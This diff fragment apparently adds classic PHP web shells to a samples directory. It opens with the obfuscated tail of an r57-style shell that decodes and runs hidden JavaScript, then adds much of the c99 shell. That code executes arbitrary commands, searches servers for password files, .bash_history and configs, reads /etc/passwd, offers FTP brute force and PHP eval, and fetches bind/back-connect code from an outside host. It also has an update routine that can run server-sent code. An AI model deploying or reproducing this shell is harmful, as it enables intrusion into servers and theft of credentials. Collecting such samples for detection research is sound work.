e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
3151setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(1);}, 500);
3152</script>
3153<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ ROOT Shell MeTeaL TeaM . o R g<?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> root @ MeTaLTeaM.ORG <a href="http://www.metalteam.org"><font color="#FF0000">R57</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
3154</body></html><?php chdir($lastdir); exit(); ?>
diff --git a/data/samples/classic/c99.php b/data/samples/classic/c99.php
new file mode 100644
index 0000000..78884d2
--- /dev/null
+++ b/data/samples/classic/c99.php
@@ -0,0 +1,3157 @@
1<?php
2//Starting calls
3if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
4error_reporting(5);
5@ignore_user_abort(TRUE);
6@set_magic_quotes_runtime(0);
7$win = strtolower(substr(PHP_OS,0,3)) == "win";
8define("starttime",getmicrotime());
9if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
10$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
11foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
12
13$shver = "1.0 pre-release build #16"; //Current version
14//CONFIGURATION AND SETTINGS
15if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
16elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
17else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
18}
19
20$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
21
22if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
23if (empty($surl))
24{
25 $surl = "?".$includestr; //Self url
26}
27$surl = htmlspecialchars($surl);
28
29$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
30
31//Authentication
32$login = ""; //login
33//DON'T FORGOT ABOUT PASSWORD!!!
34$pass = ""; //password
35$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
36
37$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
38$login_txt = "Restricted area"; //http-auth message.
39$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
40
41$gzipencode = TRUE; //Encode with gzip?
42
43$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
44
45$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
46$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
47
48$filestealth = TRUE; //if TRUE, don't change modify- and access-time
49
50$donated_html = "<center><b>Owned by hacker</b></center>";
51/* If you publish free shell and you wish
52add link to your site or any other information,
53put here your html. */
54$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
55
56$curdir = "./"; //start folder
57//$curdir = getenv("DOCUMENT_ROOT");
58$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
59$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
60
61$log_email = "user@host.tld"; //Default e-mail for sending logs
62
63$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
64$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
65
66// Registered file-types.
67// array(
68// "{action1}"=>array("ext1","ext2","ext3",...),
69// "{action2}"=>array("ext4","ext5","ext6",...),
70// ...
71// )
72$ftypes = array(
73 "html"=>array("html","htm","shtml"),
74 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
75 "exe"=>array("sh","install","bat","cmd"),
76 "ini"=>array("ini","inf"),
77 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
78 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
79 "sdb"=>array("sdb"),
80 "phpsess"=>array("sess"),
81 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
82);
83
84// Registered executable file-types.
85// array(
86// string "command{i}"=>array("ext1","ext2","ext3",...),
87// ...
88// )
89// {command}: %f% = filename
90$exeftypes = array(
91 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
92 "perl %f%" => array("pl","cgi")
93);
94
95/* Highlighted files.
96 array(
97 i=>array({regexp},{type},{opentag},{closetag},{break})
98 ...
99 )
100 string {regexp} - regular exp.
101 int {type}:
1020 - files and folders (as default),
1031 - files only, 2 - folders only
104 string {opentag} - open html-tag, e.g. "<b>" (default)
105 string {closetag} - close html-tag, e.g. "</b>" (default)
106 bool {break} - if TRUE and found match then break
107*/
108$regxp_highlight = array(
109 array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
110 array("config.php",1) // example
111);
112
113$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
114 // array (i=>{letter} ...); string {letter} - letter of a drive
115//$safemode_diskettes = range("a","z");
116$hexdump_lines = 8;// lines in hex preview file
117$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
118
119$nixpwdperpage = 100; // Get first N lines from /etc/passwd
120
121$bindport_pass = "c999"; // default password for binding
122$bindport_port = "31373"; // default port for binding
123$bc_port = "31373"; // default port for back-connect
124$datapipe_localport = "8081"; // default port for datapipe
125
126// Command-aliases
127if (!$win)
128{
129 $cmdaliases = array(
130 array("-----------------------------------------------------------", "ls -la"),
131 array("find all suid files", "find / -type f -perm -04000 -ls"),
132 array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
133 array("find all sgid files", "find / -type f -perm -02000 -ls"),
134 array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
135 array("find config.inc.php files", "find / -type f -name config.inc.php"),
136 array("find config* files", "find / -type f -name \"config*\""),
137 array("find config* files in current dir", "find . -type f -name \"config*\""),
138 array("find all writable folders and files", "find / -perm -2 -ls"),
139 array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
140 array("find all service.pwd files", "find / -type f -name service.pwd"),
141 array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
142 array("find all .htpasswd files", "find / -type f -name .htpasswd"),
143 array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
144 array("find all .bash_history files", "find / -type f -name .bash_history"),
145 array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
146 array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
147 array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
148 array("list file attributes on a Linux second extended file system", "lsattr -va"),
149 array("show opened ports", "netstat -an | grep -i listen")
150 );
151}
152else
153{
154 $cmdaliases = array(
155 array("-----------------------------------------------------------", "dir"),
156 array("show opened ports", "netstat -an")
157 );
158}
159
160$sess_cookie = "c999shvars"; // Cookie-variable name
161
162$usefsbuff = TRUE; //Buffer-function
163$copy_unset = FALSE; //Remove copied files from buffer after pasting
164
165//Quick launch
166$quicklaunch = array(
167 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
168 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
169 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
170 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
171 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
172 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
173 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
174 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
175 array("<b>Tools</b>",$surl."act=tools&d=%d"),
176 array("<b>Proc.</b>",$surl."act=processes&d=%d"),
177 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
178 array("<b>Sec.</b>",$surl."act=security&d=%d"),
179 array("<b>SQL</b>",$surl."act=sql&d=%d"),
180 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
181 array("<b>Update</b>",$surl."act=update&d=%d"),
182 array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
183 array("<b>Self remove</b>",$surl."act=selfremove"),
184 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
185);
186
187//Highlight-code colors
188$highlight_background = "#c0c0c0";
189$highlight_bg = "#FFFFFF";
190$highlight_comment = "#6A6A6A";
191$highlight_default = "#0000BB";
192$highlight_html = "#1300FF";
193$highlight_keyword = "#007700";
194$highlight_string = "#000000";
195
196@$f = $_REQUEST["f"];
197@extract($_REQUEST["c999shcook"]);
198
199//END CONFIGURATION
200
201
202// \/Next code isn't for editing\/
203@set_time_limit(0);
204$tmp = array();
205foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
206$s = "!^(".implode("|",$tmp).")$!i";
207if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc999shell\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
208if (!empty($login))
209{
210 if (empty($md5_pass)) {$md5_pass = md5($pass);}
211 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
212 {
213 if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
214 header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
215 header("HTTP/1.0 401 Unauthorized");
216 exit($accessdeniedmess);
217 }
218}
219if ($act != "img")
220{
221$lastdir = realpath(".");
222chdir($curdir);
223if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
224$sess_data = unserialize($_COOKIE["$sess_cookie"]);
225if (!is_array($sess_data)) {$sess_data = array();}
226if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
227if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
228
229$disablefunc = @ini_get("disable_functions");
230if (!empty($disablefunc))
231{
232 $disablefunc = str_replace(" ","",$disablefunc);
233 $disablefunc = explode(",",$disablefunc);
234}
235
236if (!function_exists("c999_buff_prepare"))
237{
238function c999_buff_prepare()
239{
240 global $sess_data;
241 global $act;
242 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
243 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
244 $sess_data["copy"] = array_unique($sess_data["copy"]);
245 $sess_data["cut"] = array_unique($sess_data["cut"]);
246 sort($sess_data["copy"]);
247 sort($sess_data["cut"]);
248 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
249 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
250}
251}
252c999_buff_prepare();
253if (!function_exists("c999_sess_put"))
254{
255function c999_sess_put($data)
256{
257 global $sess_cookie;
258 global $sess_data;
259 c999_buff_prepare();
260 $sess_data = $data;
261 $data = serialize($data);
262 setcookie($sess_cookie,$data);
263}
264}
265foreach (array("sort","sql_sort") as $v)
266{
267 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
268 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
269}
270if ($sort_save)
271{
272 if (!empty($sort)) {setcookie("sort",$sort);}
273 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
274}
275if (!function_exists("str2mini"))
276{
277function str2mini($content,$len)
278{
279 if (strlen($content) > $len)
280 {
281 $len = ceil($len/2) - 2;
282 return substr($content, 0,$len)."...".substr($content,-$len);
283 }
284 else {return $content;}
285}
286}
287if (!function_exists("view_size"))
288{
289function view_size($size)
290{
291 if (!is_numeric($size)) {return FALSE;}
292 else
293 {
294 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
295 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
296 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
297 else {$size = $size . " B";}
298 return $size;
299 }
300}
301}
302if (!function_exists("fs_copy_dir"))
303{
304function fs_copy_dir($d,$t)
305{
306 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
307 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
308 $h = opendir($d);
309 while (($o = readdir($h)) !== FALSE)
310 {
311 if (($o != ".") and ($o != ".."))
312 {
313 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
314 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
315 if (!$ret) {return $ret;}
316 }
317 }
318 closedir($h);
319 return TRUE;
320}
321}
322if (!function_exists("fs_copy_obj"))
323{
324function fs_copy_obj($d,$t)
325{
326 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
327 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
328 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
329 if (is_dir($d))
330 {
331 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
332 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
333 return fs_copy_dir($d,$t);
334 }
335 elseif (is_file($d)) {return copy($d,$t);}
336 else {return FALSE;}
337}
338}
339if (!function_exists("fs_move_dir"))
340{
341function fs_move_dir($d,$t)
342{
343 $h = opendir($d);
344 if (!is_dir($t)) {mkdir($t);}
345 while (($o = readdir($h)) !== FALSE)
346 {
347 if (($o != ".") and ($o != ".."))
348 {
349 $ret = TRUE;
350 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
351 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
352 if (!$ret) {return $ret;}
353 }
354 }
355 closedir($h);
356 return TRUE;
357}
358}
359if (!function_exists("fs_move_obj"))
360{
361function fs_move_obj($d,$t)
362{
363 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
364 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
365 if (is_dir($d))
366 {
367 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
368 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
369 return fs_move_dir($d,$t);
370 }
371 elseif (is_file($d))
372 {
373 if(copy($d,$t)) {return unlink($d);}
374 else {unlink($t); return FALSE;}
375 }
376 else {return FALSE;}
377}
378}
379if (!function_exists("fs_rmdir"))
380{
381function fs_rmdir($d)
382{
383 $h = opendir($d);
384 while (($o = readdir($h)) !== FALSE)
385 {
386 if (($o != ".") and ($o != ".."))
387 {
388 if (!is_dir($d.$o)) {unlink($d.$o);}
389 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
390 }
391 }
392 closedir($h);
393 rmdir($d);
394 return !is_dir($d);
395}
396}
397if (!function_exists("fs_rmobj"))
398{
399function fs_rmobj($o)
400{
401 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
402 if (is_dir($o))
403 {
404 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
405 return fs_rmdir($o);
406 }
407 elseif (is_file($o)) {return unlink($o);}
408 else {return FALSE;}
409}
410}
411if (!function_exists("myshellexec"))
412{
413function myshellexec($cmd)
414{
415 global $disablefunc;
416 $result = "";
417 if (!empty($cmd))
418 {
419 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
420 elseif (($result = `$cmd`) !== FALSE) {}
421 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
422 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
423 elseif (is_resource($fp = popen($cmd,"r")))
424 {
425 $result = "";
426 while(!feof($fp)) {$result .= fread($fp,1024);}
427 pclose($fp);
428 }
429 }
430 return $result;
431}
432}
433if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
434if (!function_exists("view_perms"))
435{
436function view_perms($mode)
437{
438 if (($mode & 0xC000) === 0xC000) {$type = "s";}
439 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
440 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
441 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
442 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
443 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
444 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
445 else {$type = "?";}
446
447 $owner["read"] = ($mode & 00400)?"r":"-";
448 $owner["write"] = ($mode & 00200)?"w":"-";
449 $owner["execute"] = ($mode & 00100)?"x":"-";
450 $group["read"] = ($mode & 00040)?"r":"-";
451 $group["write"] = ($mode & 00020)?"w":"-";
452 $group["execute"] = ($mode & 00010)?"x":"-";
453 $world["read"] = ($mode & 00004)?"r":"-";
454 $world["write"] = ($mode & 00002)? "w":"-";
455 $world["execute"] = ($mode & 00001)?"x":"-";
456
457 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
458 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
459 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
460
461 return $type.join("",$owner).join("",$group).join("",$world);
462}
463}
464if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
465if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
466if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
467if (!function_exists("parse_perms"))
468{
469function parse_perms($mode)
470{
471 if (($mode & 0xC000) === 0xC000) {$t = "s";}
472 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
473 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
474 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
475 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
476 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
477 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
478 else {$t = "?";}
479 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
480 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
481 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
482 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
483}
484}
485if (!function_exists("parsesort"))
486{
487function parsesort($sort)
488{
489 $one = intval($sort);
490 $second = substr($sort,-1);
491 if ($second != "d") {$second = "a";}
492 return array($one,$second);
493}
494}
495if (!function_exists("view_perms_color"))
496{
497function view_perms_color($o)
498{
499 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
500 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
501 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
502}
503}
504if (!function_exists("c999getsource"))
505{
506function c999getsource($fn)
507{
508 global $c999sh_sourcesurl;
509 $array = array(
510 "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
511 "c999sh_bindport.c" => "c999sh_bindport_c.txt",
512 "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
513 "c999sh_backconn.c" => "c999sh_backconn_c.txt",
514 "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
515 "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
516 );
517 $name = $array[$fn];
518 if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
519 else {return FALSE;}
520}
521}
522if (!function_exists("c999sh_getupdate"))
523{
524function c999sh_getupdate($update = TRUE)
525{return "Can't connect to update-server!";
526
527 $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
528 $data = @file_get_contents($url);
529 if (!$data) {return "Can't connect to update-server!";}
530 else
531 {
532 $data = ltrim($data);
533 $string = substr($data,3,ord($data{2}));
534 if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
535 if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
536 if ($data{0} == "\x99" and $data{1} == "\x03")
537 {
538 $string = explode("\x01",$string);
539 if ($update)
540 {
541 $confvars = array();
542 $sourceurl = $string[0];
543 $source = file_get_contents($sourceurl);
544 if (!$source) {return "Can't fetch update!";}
545 else
546 {
547 $fp = fopen(__FILE__,"w");
548 if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
549 else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
550 }
551 }
552 else {return "New version are available: ".$string[1];}
553 }
554 elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
555 else {return "Error in protocol: segmentation failed! (".$data.") ";}
556 }
557}
558}
559if (!function_exists("mysql_dump"))
560{
561function mysql_dump($set)
562{
563 global $shver;
564 $sock = $set["sock"];
565 $db = $set["db"];
566 $print = $set["print"];
567 $nl2br = $set["nl2br"];
568 $file = $set["file"];
569 $add_drop = $set["add_drop"];
570 $tabs = $set["tabs"];
571 $onlytabs = $set["onlytabs"];
572 $ret = array();
573 $ret["err"] = array();
574 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
575 if (empty($db)) {$db = "db";}
576 if (empty($print)) {$print = 0;}
577 if (empty($nl2br)) {$nl2br = 0;}
578 if (empty($add_drop)) {$add_drop = TRUE;}
579 if (empty($file))
580 {
581 $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
582 }
583 if (!is_array($tabs)) {$tabs = array();}
584 if (empty($add_drop)) {$add_drop = TRUE;}
585 if (sizeof($tabs) == 0)
586 {
587 // retrive tables-list
588 $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
589 if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
590 }
591 $out = "# Dumped by c999Shell.SQL v. ".$shver."
592# Home page: http://ccteam.ru
593#
594# Host settings:
595# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
596# Date: ".date("d.m.Y H:i:s")."
597# DB: \"".$db."\"
598#---------------------------------------------------------
599";
600 $c = count($onlytabs);
601 foreach($tabs as $tab)
602 {
603 if ((in_array($tab,$onlytabs)) or (!$c))
604 {
605 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
606 // recieve query for create table structure
607 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
608 if (!$res) {$ret["err"][] = mysql_smarterror();}
609 else
610 {
611 $row = mysql_fetch_row($res);
612 $out .= $row["1"].";\n\n";
613 // recieve table variables
614 $res = mysql_query("SELECT * FROM `$tab`", $sock);
615 if (mysql_num_rows($res) > 0)
616 {
617 while ($row = mysql_fetch_assoc($res))
618 {
619 $keys = implode("`, `", array_keys($row));
620 $values = array_values($row);
621 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
622 $values = implode("', '", $values);
623 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
624 $out .= $sql;
625 }
626 }
627 }
628 }
629 }
630 $out .= "#---------------------------------------------------------------------------------\n\n";
631 if ($file)
632 {
633 $fp = fopen($file, "w");
634 if (!$fp) {$ret["err"][] = 2;}
635 else
636 {
637 fwrite ($fp, $out);
638 fclose ($fp);
639 }
640 }
641 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
642 return $out;
643}
644}
645if (!function_exists("mysql_buildwhere"))
646{
647function mysql_buildwhere($array,$sep=" and",$functs=array())
648{
649 if (!is_array($array)) {$array = array();}
650 $result = "";
651 foreach($array as $k=>$v)
652 {
653 $value = "";
654 if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
655 $value .= "'".addslashes($v)."'";
656 if (!empty($functs[$k])) {$value .= ")";}
657 $result .= "`".$k."` = ".$value.$sep;
658 }
659 $result = substr($result,0,strlen($result)-strlen($sep));
660 return $result;
661}
662}
663if (!function_exists("mysql_fetch_all"))
664{
665function mysql_fetch_all($query,$sock)
666{
667 if ($sock) {$result = mysql_query($query,$sock);}
668 else {$result = mysql_query($query);}
669 $array = array();
670 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
671 mysql_free_result($result);
672 return $array;
673}
674}
675if (!function_exists("mysql_smarterror"))
676{
677function mysql_smarterror($type,$sock)
678{
679 if ($sock) {$error = mysql_error($sock);}
680 else {$error = mysql_error();}
681 $error = htmlspecialchars($error);
682 return $error;
683}
684}
685if (!function_exists("mysql_query_form"))
686{
687function mysql_query_form()
688{
689 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
690 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
691 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
692 if ((!$submit) or ($sql_act))
693 {
694 echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
695 if ($tbl_struct)
696 {
697 echo "<td valign=\"top\"><b>Fields:</b><br>";
698 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
699 echo "</td></tr></table>";
700 }
701 }
702 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
703}
704}
705if (!function_exists("mysql_create_db"))
706{
707function mysql_create_db($db,$sock="")
708{
709 $sql = "CREATE DATABASE `".addslashes($db)."`;";
